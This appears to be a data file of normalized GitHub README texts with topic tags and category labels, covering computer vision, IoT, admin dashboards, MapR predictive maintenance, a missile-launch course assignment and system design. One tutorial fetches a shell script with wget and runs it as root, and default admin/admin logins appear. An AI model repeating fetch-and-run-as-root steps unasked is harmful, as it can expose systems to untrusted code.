gaussian gaussian noise gaussian kernel example img src https user images githubusercontent com 56310078 76088890 24156280 5ffc 11ea 8792 27e5984a5048 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088894 25df2600 5ffc 11ea 9b51 aed02a0a9576 jpg width 400 height 400 output median filtered 1x1 output gaussian filtered 1x1 input output gaussian noised img src https user images githubusercontent com 56310078 76087010 a56af600 5ff8 11ea 8817 9f2f09786918 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088942 3b545000 5ffc 11ea 861e e6832170715c jpg width 400 height 400 output median filtered 1x1 output gaussian filtered 1x1 img src https user images githubusercontent com 56310078 76088992 4c04c600 5ffc 11ea 908e 456ed09699d0 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088949 3c857d00 5ffc 11ea 84bc 6e053ebea2dd jpg width 400 height 400 output median filtered 3x3 output gaussian filtered 3x3 img src https user images githubusercontent com 56310078 76088998 4d35f300 5ffc 11ea 88f2 a4a1afe50470 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088954 3db6aa00 5ffc 11ea 8cec 42c387fa7956 jpg width 400 height 400 output median filtered 5x5 output gaussian filtered 5x5 img src https user images githubusercontent com 56310078 76089001 4dce8980 5ffc 11ea 9a01 3c3d37d4b990 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088963 3f806d80 5ffc 11ea 8d41 42b53a57983f jpg width 400 height 400 output median filtered 7x7 output gaussian filtered 7x7 img src https user images githubusercontent com 56310078 76089005 4effb680 5ffc 11ea 9435 c44b37bc9bff jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088969 414a3100 5ffc 11ea 8f09 089022fc0853 jpg width 400 height 400 output median filtered 9x9 output gaussian filtered 9x9 img src https user images githubusercontent com 56310078 76089009 5030e380 5ffc 11ea 9cb1 11f9355881fc jpg width 400 height 400 img src https user images githubusercontent com 56310078 76088972 427b5e00 5ffc 11ea 8c89 3b7082f75a79 jpg width 400 height 400 gaussian noised result filtered image sigma of gaussian output sigmax sigmay 1 output sigmax sigmay 3 output sigmax sigmay 5 img src https user images githubusercontent com 56310078 76089336 ccc3c200 5ffc 11ea 9bca f7442932085d jpg width 300 height 300 img src https user images githubusercontent com 56310078 76089338 cdf4ef00 5ffc 11ea 8df3 cb5f51213ad2 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76089340 cf261c00 5ffc 11ea 9b8d e3fa70bd93db jpg width 300 height 300 go 0 outline 0 outline 5 edge canny edge input output img src https user images githubusercontent com 56310078 76087010 a56af600 5ff8 11ea 8817 9f2f09786918 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76089630 5d9a9d80 5ffd 11ea 806d 2667db63520a jpg width 400 height 400 canny edge another result input output min threshold0 img src https user images githubusercontent com 56310078 76090314 af8ff300 5ffe 11ea 9f51 ad4bde899e3f jpg width 300 height 300 img src https user images githubusercontent com 56310078 76090542 16151100 5fff 11ea 914d 6b240743aae3 jpg width 300 height 300 output min threshold25 output min threshold50 img src https user images githubusercontent com 56310078 76090546 17463e00 5fff 11ea 9417 1a70101dbca7 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76090553 18776b00 5fff 11ea 8d93 ae519a310421 jpg width 300 height 300 output min threshold75 output min threshold100 img src https user images githubusercontent com 56310078 76090326 b4ed3d80 5ffe 11ea 901e 8132613ded14 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76090329 b61e6a80 5ffe 11ea 8d0c 6781fb114220 jpg width 300 height 300 sobel edge x direction y direction img src https user images githubusercontent com 56310078 76090886 c7b44200 5fff 11ea 89bf ad210d498668 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76090889 c84cd880 5fff 11ea 9d38 31f36155a52c jpg width 300 height 300 magnitude x y direction x y img src https user images githubusercontent com 56310078 76090893 caaf3280 5fff 11ea 9806 872624bba143 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76090895 cc78f600 5fff 11ea 9ed3 792d2fa575e6 jpg width 300 height 300 go 0 outline 0 outline 6 corner and blob detector harris corner detector threshold low detected corners many input output img src https user images githubusercontent com 56310078 76091682 62f9e700 6001 11ea 92ef be0413b76c3f jpg width 300 height 300 img src https user images githubusercontent com 56310078 76091565 2928e080 6001 11ea 9bd1 5483d1a132ec jpg width 300 height 300 sift blob detector input output img src https user images githubusercontent com 56310078 76091682 62f9e700 6001 11ea 92ef be0413b76c3f jpg width 300 height 300 img src https user images githubusercontent com 56310078 76091647 4fe71700 6001 11ea 977b 6fabef4f5b1d jpg width 300 height 300 go 0 outline 0 outline 7 fitting find good matches ex method lmeds input output object img src https user images githubusercontent com 56310078 76092853 74dc8980 6003 11ea 9488 dd7834499750 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76092819 67270400 6003 11ea 8367 d144ec523118 jpg width 400 height 400 input output scene img src https user images githubusercontent com 56310078 76092855 76a64d00 6003 11ea 8b46 3217fc6096c7 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76092829 6b532180 6003 11ea 834c 7690abf79eb6 jpg width 400 height 400 output good matches object detection img src https user images githubusercontent com 56310078 76093612 9f7b1200 6004 11ea 9bd5 614613ae1993 jpg width 400 height 400 homography estimation method 0 ransac lmeds of finehomography function 0 object ransac object lmeds object img src https user images githubusercontent com 56310078 76094453 01884700 6006 11ea 98ea 72b4294ea6d7 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76094456 03eaa100 6006 11ea 9fcf 36cb36d88864 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76094458 051bce00 6006 11ea 8697 22f295c4331b jpg width 300 height 300 0 scene ransac scene lmeds scene img src https user images githubusercontent com 56310078 76094473 0c42dc00 6006 11ea 8a05 1bc4c7a43421 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76094476 0d740900 6006 11ea 9ead f0275f8128ab jpg width 300 height 300 img src https user images githubusercontent com 56310078 76094481 0ea53600 6006 11ea 9c46 b4114699358f jpg width 300 height 300 0 good matches object detection ransac good matches object detection lmeds good matches object detection img src https user images githubusercontent com 56310078 76094489 11a02680 6006 11ea 9aa8 f88eb6f5d79b jpg width 300 height 300 img src https user images githubusercontent com 56310078 76094490 12d15380 6006 11ea 9c1f 9bf521f4691f jpg width 300 height 300 img src https user images githubusercontent com 56310078 76094495 14028080 6006 11ea 8aa5 93f7ca21a741 jpg width 300 height 300 go 0 outline 0 outline 8 calibration 1 pring checkerboard 2 using camcalibrator tool of darkpgmr 3 check calibrate and calculate focal length of your camera go 0 outline 0 outline 9 stereo matching and rendering block matching based disparity input left input right img src https user images githubusercontent com 56310078 76100167 92afeb80 600f 11ea 8327 d1272fadab70 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100170 93e11880 600f 11ea 96c7 c553d32538d9 jpg width 400 height 400 output support 5 output support 7 img src https user images githubusercontent com 56310078 76100172 9479af00 600f 11ea 94a6 a90ad778d45c jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100173 95aadc00 600f 11ea 820d 61fe5e4e8744 jpg width 400 height 400 output support 9 output support 11 img src https user images githubusercontent com 56310078 76100176 96dc0900 600f 11ea 9c5a 892f224365db jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100179 980d3600 600f 11ea 92e6 0d868a85a82c jpg width 400 height 400 output support 15 output support 17 img src https user images githubusercontent com 56310078 76100182 993e6300 600f 11ea 80e7 d6efacd54b57 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100189 99d6f980 600f 11ea 8a3a 2a1d1431b1ea jpg width 400 height 400 output support 19 output support 21 img src https user images githubusercontent com 56310078 76100192 9b082680 600f 11ea 93f3 334161501822 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100195 9cd1ea00 600f 11ea 8b03 d067ecf64730 jpg width 400 height 400 3d rendering output x y z depth image result 0 0 140 img src https user images githubusercontent com 56310078 76100206 a0fe0780 600f 11ea 8c22 38e8cef75511 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76100210 a22f3480 600f 11ea 8a2e dbdb59675abf jpg width 300 height 300 56 0 140 img src https user images githubusercontent com 56310078 76100215 a3606180 600f 11ea 9637 319353dfa0b1 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76100221 a3f8f800 600f 11ea 92f7 4e6ba99c09ce jpg width 300 height 300 42 0 140 img src https user images githubusercontent com 56310078 76100223 a52a2500 600f 11ea 8fc2 fa7afc9e7c9f jpg width 300 height 300 img src https user images githubusercontent com 56310078 76100229 a65b5200 600f 11ea 9c10 3bafc166d37e jpg width 300 height 300 0 0 0 img src https user images githubusercontent com 56310078 76100231 a6f3e880 600f 11ea 8d31 601e403452f2 jpg width 300 height 300 img src https user images githubusercontent com 56310078 76100235 a78c7f00 600f 11ea 9f87 d1dea2f88298 jpg width 300 height 300 texture mapping on the 3d shape using opengl input output no move img src https user images githubusercontent com 56310078 76100386 e6bad000 600f 11ea 94c5 3ef7291a1c91 png width 400 height 400 img src https user images githubusercontent com 56310078 76100243 ad826000 600f 11ea 8bfb 94addcf267a3 jpg width 400 height 400 output move output inner img src https user images githubusercontent com 56310078 76100257 b115e700 600f 11ea 9df3 3a409c4decd4 jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100260 b2471400 600f 11ea 9c99 6af968ef01d2 jpg width 400 height 400 full video demo texture mapping https blog naver com kimnanhee97 221841256177 sample ezgif com gif maker https user images githubusercontent com 56310078 76101954 9729d380 6012 11ea 893f 358ae7d1ecba gif go 0 outline 0 outline 10 face and body detection input output img src https user images githubusercontent com 56310078 76100353 da367780 600f 11ea 936d bcf2a5f6cbbf jpg width 400 height 400 img src https user images githubusercontent com 56310078 76100397 ede1de00 600f 11ea 83a9 2a8a2a1034c5 jpg width 400 height 400 go 0 outline 0 outline image source searching at google matlab nanhee kim s and sungho kim class colorful stock https www 123rf com photo 48456275 stock illustration abstract conceptual design of the wall abstract colorful graphic background made of colored cubes in html corni fructus https blog naver com ds4098 221410254623 earth https solarsystem nasa gov resources 786 blue marble 2002 colorful star searching at google rhone river vincent van gogh searching at google lemona myimg nanhee kim nanhee kim others prof sungho kim class matlab and prof sungho kim author nanhee kim nh9k https nh9k github io 2020 01 28 introduce myself
camera-distortion color-space image-filtering edge corner-and-blob-detector fitting calibration stereo-matching-and-rendering face-and-body-detection opencv opengl
ai
sample_laravel_app
steps to set up 1 clone repository 2 composer install 3 cp env example env 4 set up necessary env config e g database 5 php artisan key generate 6 php artisan migrate 7 php artisan passport install 8 php artisan serve
server
ESP8266-open-rtos
esp8266 open rtos development plugin for jetbrains clion this plugin allow you to develop a new project using the esp 8266 open rtos https github com superhouse esp open rtos and directly flash it installation install the plugin from the jetbrains repository https plugins jetbrains com plugin you have to install also the esp 8266 open rtos https github com superhouse esp open rtos esptool https github com espressif esptool and the xtensa compiler from esp8266 pen sdk https github com pfalcon esp open sdk differently from the esp 8266 open rtos https github com superhouse esp open rtos instructions you don t have to set in the path environment variable the path of the xtensa compiler but it is enough to indicate in the plugin setup phase setup in setting build execution deployment build tools esp8266 config set the xtensa lx106 elf gcc and xtensa lx106 elf g program path creating a new project file new project select the c esp8266 free rtos type set the wanted flash size and flash mode and flash speed and seria port to use select the extra projects you want use press crete button then the plugin will crete all the file needs by clion in order to compile and flash depending on the target selected it create also a starting basic file mainuser c others if you like the plugin you may star the project at github button at top right of the page and at jetbrains plugins repository https plugins jetbrains com plugin 10115
os
antd-admin
p align center a href http github com zuiidea antd admin img alt antd admin height 64 src docs media logo svg a p h1 align center antd admin h1 div align center an excellent front end solution for enterprise applications antd https img shields io badge antd 4 0 0 blue svg style flat square https github com ant design ant design umi https img shields io badge umi 2 2 1 orange svg style flat square https github com umijs umi github issues https img shields io github issues zuiidea antd admin svg style flat square https github com zuiidea antd admin issues mit https img shields io dub l vibe d svg style flat square http opensource org licenses mit travis org https img shields io travis zuiidea antd admin svg prs welcome https img shields io badge prs welcome brightgreen svg style flat square https github com zuiidea antd admin pulls gitter https img shields io gitter room antd admin antd admin svg https gitter im antd admin antd admin div preview https antd admin zuiidea com https antd admin zuiidea com documentation https superlbr gitee io antd admin https superlbr gitee io antd admin faq https doc antd admin zuiidea com faq https doc antd admin zuiidea com faq changelog https doc antd admin zuiidea com change log https doc antd admin zuiidea com change log english readme zh cn md features internationalization extracting translation fields from source code loading language packs on demand dynamic permissions different permissions for different menus elegant and beautiful ant design system mock data local data debugging usage 1 clone project code bash git clone https github com zuiidea antd admin git my project cd my project 2 installation dependence bash yarn install or bash npm install 3 start local server bash npm run start 4 after the startup is complete open a browser and visit http localhost 7000 http localhost 7000 if you need to change the startup port you can configure it in the env file 5 for login page there re two account username admin password admin username guest password guest more instructions at documentation https doc antd admin zuiidea com browsers support modern browsers img src https raw githubusercontent com alrra browser logos master src edge edge 48x48 png alt ie edge width 24px height 24px http godban github io browsers support badges br ie edge img src https raw githubusercontent com alrra browser logos master src firefox firefox 48x48 png alt firefox width 24px height 24px http godban github io browsers support badges br firefox img src https raw githubusercontent com alrra browser logos master src chrome chrome 48x48 png alt chrome width 24px height 24px http godban github io browsers support badges br chrome img src https raw githubusercontent com alrra browser logos master src safari safari 48x48 png alt safari width 24px height 24px http godban github io browsers support badges br safari img src https raw githubusercontent com alrra browser logos master src opera opera 48x48 png alt opera width 24px height 24px http godban github io browsers support badges br opera ie11 edge last 2 versions last 2 versions last 2 versions last 2 versions contributing we very much welcome your contribution you can build together with us in the following ways smiley use ant design pro in your daily work submit github issues http github com zuiidea antd admin issues s to report bugs or ask questions propose pull request http github com zuiidea antd admin pulls to improve our code
antd react mock admin dashboard
front_end
Smart-IoT-Planting-System
sips smart iot planting system mit licence https badges frapsoft com os mit mit svg v 103 https opensource org licenses mit license php sips is an intelligence smart automatic planting system in the agricultural greenhouse which is base on iot technology it consists of sensors terminal device stm32 mcu gateway rpi web server this system adopted lora mqtt gsm module django web framework echarts bootstrap and ajax most of the source codes are implemented by python features environmental monitoring show environment information such as air temperature humility light intensity soil moisture water level raining volume irrigating remotely control pump to irrigate by 3 methods auto manual or regularly security system trigger alarm while detecting signal from ir sensor light controlling control light by 3 methods auto manual or regularly devices tracking show the online status battery of all the hardware devices file mangement mange database file of gateway project diagram alt text https github com python iot smart iot planting system blob master arch arch diagram png hardware lists alt text https github com python iot smart iot planting system blob master arch hardware kit 2 jpg obtain hardware contact me by mail wechat or twitter mail mikepetermessidona hotmail com wechat arvin messi twitter messi arvin deployment steps download source code obtain hardware kits typboard wiring and firmware download gateway raspberrypi wiring and software deployment and application running deploy source code of cloud on server and execute it test the system via browser cloud ui alt text https github com python iot smart iot planting system blob master arch environment png
server
predictive-maintenance
mapr for predictive maintenance this project is intended to show how to build predictive maintenance applications on mapr predictive maintenance applications place high demands on data streaming time series data storage and machine learning therefore this project focuses on data ingest with mapr streams time series data storage with mapr db and opentsdb and feature engineering with mapr db and apache spark overview predictive maintenance requires a cutting edge data platform in order to handle fast streams of iot data with the processing required for on the fly feature engineering and the flexibility required for data science and machine learning ingesting factory iot data predictive maintenance applications rely heavily on ingesting multiple data sources each with their own format and throughput mapr streams can ingest data regardless of format or speed with standard kafka and restful apis machine learning on factory iot data the predictive aspects of predictive maintenance applications are usually realized through machine learning feature engineering is often considered the most important aspect of machine learning as opposed to neural network design for example feature engineering places the high demands on the data layer because the amount of data that iot data streams generate the tendency for failures to occur infrequently and without warning means vast amounts of raw time series data must be stored not only must it be stored but it must also be possible to retroactively update the lagging features necessary in order to label failures for the purposes of supervised machine learning mapr db and spark can work together to provide the capabiltieis required to put machine learning into practice for predictive maintance in summary mapr streams provide a convenient way to ingest iot data because it is scalable and provides convenient interfaces the integration of mapr db with spark provides a convenient way to label lagging features needed for predicting failures via supervised machine learning drill provides a convenient way to load ml data sets into tensorflow for unsupervised and supervised machine learning implementation summary there are two objectives relating to predictive maintenance implemented in this project the first objective is to visualize time series data in an interactive real time dashboard in grafana the second objective is to make raw data streams and derived features available to machine learning frameworks such as tensorflow in order to develop algorithms for anomaly detection and predictive maintenance these two objects are realized using two seperate data flows 1 the first flow located on the top half of the image below is intended to persist iot data and label training data for sequence prediction and anomaly detection of time series data in tensorflow img src https github com mapr demos predictive maintenance blob master images bi pipeline png width 50 2 the second flow located on the bottom half is intended to persist time series iot data in opentsdb for visualization in a grafana dashboard img src https github com mapr demos predictive maintenance blob master images ml pipeline png width 50 put together these data pipelines look like this the apis used for reading and writing data are shown in red img src https github com mapr demos predictive maintenance blob master images dataflow png width 50 preliminary steps these steps explain how to setup this tutorial using the mapr container for developers https maprdocs mapr com home maprcontainerdevelopers maprcontainerdevelopersoverview html on macos allocate 12gb to docker this tutorial requires a lot of memory we recommend allocating 12gb ram 4gb swap and 2 cpus to the docker community edition for macos img src https github com mapr demos predictive maintenance blob master images docker config png width 40 start the mapr sandbox download and run the mapr devsandbox container setup sh script git clone https github com mapr demos mapr db 60 getting started cd mapr db 60 getting started mapr devsandbox container setup sh run the init sh script run the init sh script to install spark opentsdb grafana and some other things necessary to use the sample applications in this tutorial ssh to the sandbox container with password mapr and run the following commands this should take about 20 minutes ssh p 2222 root localhost wget https raw githubusercontent com mapr demos predictive maintenance master init sh chmod 700 init sh sudo init sh import the grafana dashboard sudo opt mapr server configure sh r ot hostname f sudo opt mapr opentsdb opentsdb 2 4 0 etc init d opentsdb start open grafana data sources with a url like http maprdemo 3000 datasources edit 1 http maprdemo 3000 datasources edit 1 and add opentsdb as a new data source load the grafana iot dashboard json file using grafana s dashboard import functionality and specify maprmonitoringopentsdb as the data source as shown below img src https github com mapr demos predictive maintenance blob master images grafana import png width 50 hr predictive maintenance demo procedure for learning or debugging purposes you should run each of the following steps manually but if you just want to see data show up in grafana then just run run sh step 1 simulate hvac data stream we have provided a dataset captured from a real world heating ventilation and air conditioning hvac system in the sample dataset folder run the following command to replay that hvac stream to apps factory mqtt cat predictive maintenance sample dataset mqtt json while read line do echo line sed s timestamp date s g opt mapr kafka kafka bin kafka console producer sh topic apps factory mqtt broker list this will be ignored 9092 sleep 1 done step 2 save iot data stream to mapr db in the next step we ll save the iot data stream to opentsdb so we can visualize it in grafana but in this step we save that stream to mapr db so we can apply labels necessary for supervised machine learning as discussed in step 4 run the following command to persist messages from stream apps factory mqtt to mapr db table apps mqtt records opt mapr spark spark bin spark submit class com mapr examples mqttconsumer predictive maintenance target predictive maintenance 1 0 jar with dependencies jar apps factory mqtt apps mqtt records run this command to see how the row count increases opt mapr drill drill bin sqlline u jdbc drill n mapr select count from dfs apps mqtt records step 3 save iot data stream to opentsdb in this step we save the iot data stream to opentsdb so we can visualize it in grafana update localhost 4242 with the hostname and port of your opentsdb server before running the following command opt mapr kafka kafka bin kafka console consumer sh new consumer topic apps factory mqtt bootstrap server not applicable 0000 while read line do echo line jq r to entries map key value tostring t 0 x paste d awk system curl x post data x27 metric 3 timestamp 2 value 4 tags host localhost x27 http localhost 4242 api put echo n done after you have run that command you should be able to visualize the streaming iot data in grafana depending on where you have installed grafana this can be opened with a url like http maprdemo 3000 http maprdemo 3000 img src https github com mapr demos predictive maintenance blob master images grafana screenshot 2 png width 50 align center step 4 update lagging features in mapr db for each failure event this process will listen for failure events on a mapr streams topic and retroactively label lagging features in mapr db when failures occur as well as render the failure event in grafana update http localhost 3000 with the hostname and port for your grafana instance opt mapr spark spark bin spark submit class com mapr examples updatelaggingfeatures predictive maintenance target predictive maintenance 1 0 jar with dependencies jar apps factory failures apps mqtt records http localhost 3000 img src https github com mapr demos predictive maintenance blob master images lagging features explanation png width 70 align center this particular step probably says the most about the value of mapr because consider this if you have a factory instrumented by iot devices reporting hundreds of metrics per machine per second and you re tasked with the challenge of saving all that data until one day often months into the future you finally have a machine fail at that point you have to retroactively go back and update all those records as being about to fail or x days to failure so that you can use that data for training models to predict those lagging features that s one heck of a db update right the only way to store all that data is with a distributed database this is what makes spark and mapr db such a great fit spark the distributed processing engine for big data and mapr db the distributed data store for big data working together to process and store lots of data with speed and scalability step 5 simulate a failure event to simulate a device failure run this command echo timestamp date s d 60 sec ago devicename chiller1 opt mapr kafka kafka bin kafka console producer sh topic apps factory failures broker list this will be ignored 9092 this will trigger the spark process you ran in the previous step to update lagging features in the mapr db table apps mqtt records once it sees the event you simulated you should see it output information about the lagging features it labeled like this update lagging features screenshot images updatelagging screenshot png raw true update lagging features screenshot step 6 validate that lagging features have been updated mapr dbshell find apps mqtt records where eq chiller1abouttofail true f id chiller1abouttofail timestamp here are a few examples commands to look at that table with mapr dbshell mapr dbshell find apps mqtt records f timestamp find table apps mqtt records orderby id fields chiller2remainingusefullife id find table apps mqtt records where gt id 1523079964 orderby id fields chiller2remainingusefullife id find table apps mqtt records where gt timestamp 1523079964 fields chiller2remainingusefullife timestamp here s an example of querying iot data records table with drill opt mapr drill drill bin sqlline u jdbc drill n mapr select from dfs apps mqtt records limit 2 step 7 synthesize a high speed data stream this command simulates a high speed data stream from a vibration sensor sampling once per 10ms java cp predictive maintenance target predictive maintenance 1 0 jar with dependencies jar com mapr examples highspeedproducer apps fastdata vibrations 10 why are we simulating a vibration sensor degradation in machines often manifests itself as a low rumble or a small shake these unusual vibrations give you the first clue that a machine is nearing the end of its useful life so it s very important to detect those anomalies vibration sensors measure the displacement or velocity of motion thousands of times per second analyzing those signals is typically done in the frequency domain an algorithm called fast fourier transform fft can sample time series vibration data and identify its component frequencies in the next step you will run a command the converts the simulated vibration data to the frequency domain with an fft and raises alarms when vibration frequencies vary more than a predefined threshold vibration analysis images vibration analysis png raw true vibration analysis this demonstrates the capacity of mapr to ingest and process high speed streaming data depending on hardware you will probably see mapr streams processing more than 40 000 messages per second in this step step 8 process high speed data stream this will calculate ffts on the fly for the high speed streaming data and render an event in grafana when ffts changed more than 25 over a rolling window this simulates anomaly detection for a vibration signal update http localhost 3000 with the hostname and port for your grafana instance opt mapr spark spark bin spark submit class com mapr examples streamingfouriertransform predictive maintenance target predictive maintenance 1 0 jar with dependencies jar apps fastdata vibrations 25 0 http localhost 3000 step 9 visualize data in grafana by now you should be able to see streaming iot data vibration faults and device failures in the grafana dashboard img src https github com mapr demos predictive maintenance blob master images grafana screenshot png width 70 align center step 10 explore iot data with apache drill apache drill https drill apache org is a unix service that unifies access to data across a variety of data formats and sources mapr is the primary contributor to apache drill so naturally it is included in the mapr platform here s how you can use it to explore some of the iot data we ve gathered so far in this tutorial open the drill web interface if you re running mapr on your laptop then that s probably at http localhost 8047 http localhost 8047 here are a couple useful queries show how many messages have arrived cumulatively over days of the week select day of week long count day of week long from dfs apps mqtt records group by day of week long img src https github com mapr demos predictive maintenance blob master images drill query 1 png width 50 img src https github com mapr demos predictive maintenance blob master images drill result 1 png width 50 count how many faults have been detected with x as select id day of week long chiller1abouttofail row number over partition by chiller1abouttofail order by id as fault from dfs apps mqtt records select from x where chiller1abouttofail true and fault 1 img src https github com mapr demos predictive maintenance blob master images drill query 2 png width 50 img src https github com mapr demos predictive maintenance blob master images drill result 2 png width 50 drill can also be used to load data from mapr db into data science notebooks examples of this are shown in the following section references for machine learning techniques for predictive maintenance this tutorial focuses on data engineering i e getting data in the right format and in the right place in order to take advantage of machine learning ml for predictive maintenance applications the details of ml are beyond the scope of this tutorial but to better understand ml techniques commonly used for predictive maintenance check out the provided jupyter notebook for lstm predictions for about to fail https github com mapr demos predictive maintenance blob master notebooks jupyter lstm 20for 20predictive 20maintenance ian01 ipynb this notebook not only talks about how to use lstm but also how to generate a sample dataset with logsynth https github com tdunning log synth that resembles what you might see in a real factory this notebook is great because it explains how to experiment with lstms entirely on your laptop lstm about to fail images lstm about to fail 50 png raw true lstm about to fail prediction here are some of the other notebooks included in this repo that demonstrate ml concepts for predictive maintenance lstm predictions for remaining useful life https github com mapr demos predictive maintenance blob master notebooks jupyter lstm 20predictions 20for 20remaining 20useful 20life ipynb shows how to train a point regression model using an lstm neural network in keras to predict the point in time when an airplane engine will fail lstm time series predictions from opentsdb https github com mapr demos predictive maintenance blob master notebooks jupyter lstm 20time 20series 20prediction 20from 20opentsdb ipynb shows how to train a model to predict the next value in a sequence of numbers which in this case is a time series sequence of numbers stored in opentsdb this notebook also shows how to load training data into tensorflow using the rest api for opentsdb rnn time series predictions from opentsdb https github com mapr demos predictive maintenance blob master notebooks jupyter rnn 20time 20series 20prediction 20from 20opentsdb ipynb also shows how to train a model to predict the next value in a sequence of numbers except it uses an rnn model instead lstm rnn predictions for mapr db data via drill https github com mapr demos predictive maintenance blob master notebooks jupyter rnn 20predictions 20on 20mapr db 20data 20via 20drill ipynb also shows how to train a model to predict the next value in a sequence of numbers except it reads time series data from mapr db using drill as a sql engine streamsets demonstration to give you an idea of what dataflow management tools do i ve prepared a simple streamsets project that you can run on a laptop with docker this project demonstrates a pipeline that streams time series data recorded from an industrial hvac system into opentsdb for visualization in grafana create a docker network to bridge containers docker network create mynetwork start streamsets opentsdb and grafana docker run it p 18630 18630 d name sdc network mynetwork streamsets datacollector docker run dp 4242 4242 name hbase network mynetwork petergrace opentsdb docker docker run d p 3000 3000 name grafana network mynetwork grafana grafana open grafana at http localhost 3000 and login with admin admin add http hbase 4242 as an opentsdb datasource to grafana if you don t know how to add a data source refer to grafana docs your datasource definition should look like this img src https github com mapr demos predictive maintenance blob master images grafana opentsdb config png width 50 align center download the following grafana dashboard file wget https raw githubusercontent com mapr demos predictive maintenance master grafana iot dashboard json import that file into grafana if you don t know how to import a dashboard see grafana docs the grafana import dialog should look like this img src https github com mapr demos predictive maintenance blob master images grafana dashboard config png width 50 align center download unzip and copy the mqtt dataset to the streamsets container wget https github com mapr demos predictive maintenance raw master sample dataset mqtt json gz unzip mqtt json gz docker cp mqtt json sdc tmp mqtt json open streamsets at http localhost 18630 and login with admin admin download and import the following pipeline into streamsets if you don t know how to import a pipeline refer to streamsets docs wget https raw githubusercontent com mapr demos predictive maintenance master streamsets mqtt 20file 20tail json you will see a warning about a missing library in the parse mqtt json stage click that stage and follow the instructions to install the jython library img src https github com mapr demos predictive maintenance blob master images streamsets warning png width 50 align center finally run the streamsets pipeline img src https github com mapr demos predictive maintenance blob master images grafana streamset animation gif width 90 align center hopefully by setting up this pipeline and exploring streamsets you ll get the gist of what dataflow management tools can do
server
decide
condition checking function for interceptor launch program this project consists of an implementation of a function decide which is part of a hypothetical anti ballistic missile system the function analyses radar tracking information consisting of a collection of planar point coordinates and returns a boolean signal which determines whether an interceptor should be launched based on this information the project is a part of the course software engineering and cloud computing https kth instructure com courses 9098 the assignment is based upon the material in the article an experimental evaluation of the assumption of independence in multiversion programming j c knight and n g leveson ieee transactions on software engineering 12 1 96 109 january 1986 inputs and outputs of decide inputs the decide function has the following inputs points a matrix containing the coordinates of data points xi yi on the format x1 y1 x2 y2 parameters a struct containing parameters for the launch interceptor conditions lics lcm logical connector matrix with elements 0 notused 1 or 2 and puv preliminary unlocking vector outputs the decide function has the following outputs launch final launch no launch decision encoded as yes or no standard output cmv conditions met vector pum preliminary unlocking matrix fuv final unlocking vector description of the decide function the decide function computes whether 15 different launch interceptor conditions lics are fulfilled each of the lic functions has as inputs the x coordinates x and the y coordinates y of the points in points as well as some of the parameters in parameters the results are stored in the 15 dimensional conditions met vector cmv such that cmv i 1 if lic i is met and cmv i 0 if not the logical connector matrix lcm size 15 x 15 has as entries 0 1 and 2 to be interpreted as 0 notused 1 or 2 and this matrix represents connections between the different lics using lcm the results of the lics in cmv are combined to form the preliminary unlocking matrix pum size 15 x 15 this proceeds as follows if lcm i j 0 notused then pum i j 1 true if lcm i j 1 or then pum i j 1 true if cmv i 1 or cmv j 1 and pum i j 0 otherwise if lcm i j 2 and then pum i j 1 true if cmv i 1 and cmv j 1 and pum i j 0 otherwise the input preliminary unlocking vector puv lenght 15 has elements puv i 1 if lic i should be considered as a factor in signaling interceptor launch and puv i 0 if it should not the final unlocking vector fuv length 15 is constructed according to fuv i 1 if puv i 0 i e if lic i should not be considered fuv i 1 if puv i 1 and all elements of row i in pum are 1 true fuv i 0 otherwise finally the decision launch is set to yes if all entries of fuv are true 1 and to no otherwise how to use it the main program main m defines example inputs to the decide function invokes the function and prints the outputs of which the first one is the decision launch yes or launch no the meanings of the parameters as well as the general evaluation criteria for the lics are described in the comments of each function lic1 m lic15 m which are located in the folder conditions the program main m can be run as it is to illustrate the functioning of the decide function the user can then try to modify the paramters in parameters the entries of the logical connector matrix lcm where each entry should be an integer according to 0 notused 1 or and 2 and the preliminary unlocking vector puv where each entry is 0 or 1 corresponding to false or true as well as the data point matrix points x1 y1 x2 y2 testing the project includes a script test m that automises testing of the project functions by running the script test m each of the functions lic1 lic15 in the folder conditions is automatically tested with two test cases one input that should yield 1 true and one input that should yield 0 false the decide function is also tested with an input that should yield yes the same input as in the default example in main m the results of these tests are automatically printed the tests are defined and described in the class testingclass m which is located in the folder tests
cloud
SystemDesign
h1 basics h1 ol li network ol li a href basics network protocol readme md network protocols a li li a href basics http requests readme md http requests a ol li get li li post li li put li ol li li a href basics polling sse and web sockets readme md polling polling a li li a href basics polling sse and web sockets readme md server sent events sse server sent events a li li a href basics polling sse and web sockets readme md websockets websockets a li ol li li database ol li a href basics relational vs nonrelational readme md relational vs non relational database a li li a href basics horizontal and vertical scaling readme md horizontal vs vertical scaling a ul li a href basics horizontal and vertical scaling project project a li ul li li a href basics acid theorem readme md acid and base theorems a li li a href basics cap theorem readme md cap theorem a li li database management systems ul li ca systems ul li a href basics databases rdbms readme md rdbms mysql ca system a li li a href basics databases memcached readme md memcached ca system a li ul li li ap system ul li a href basics databases cassandra readme md cassandra ap system a li li a href basics databases redis readme md redis ap system a li ul li li cp system ul li a href basics databases mongodb readme md mongodb cp system a li ul li ul li li a href basics data partitioning methods readme md data partitioning methods a ul li a href basics data partitioning methods readme md horizontal partitioning sharding horizontal partitioning sharding a li li a href basics data partitioning methods readme md vertical partitioning vertical partitioning a li ul li li a href basics data partitioning criteria readme md data partitioning criteria a ul li a href basics data 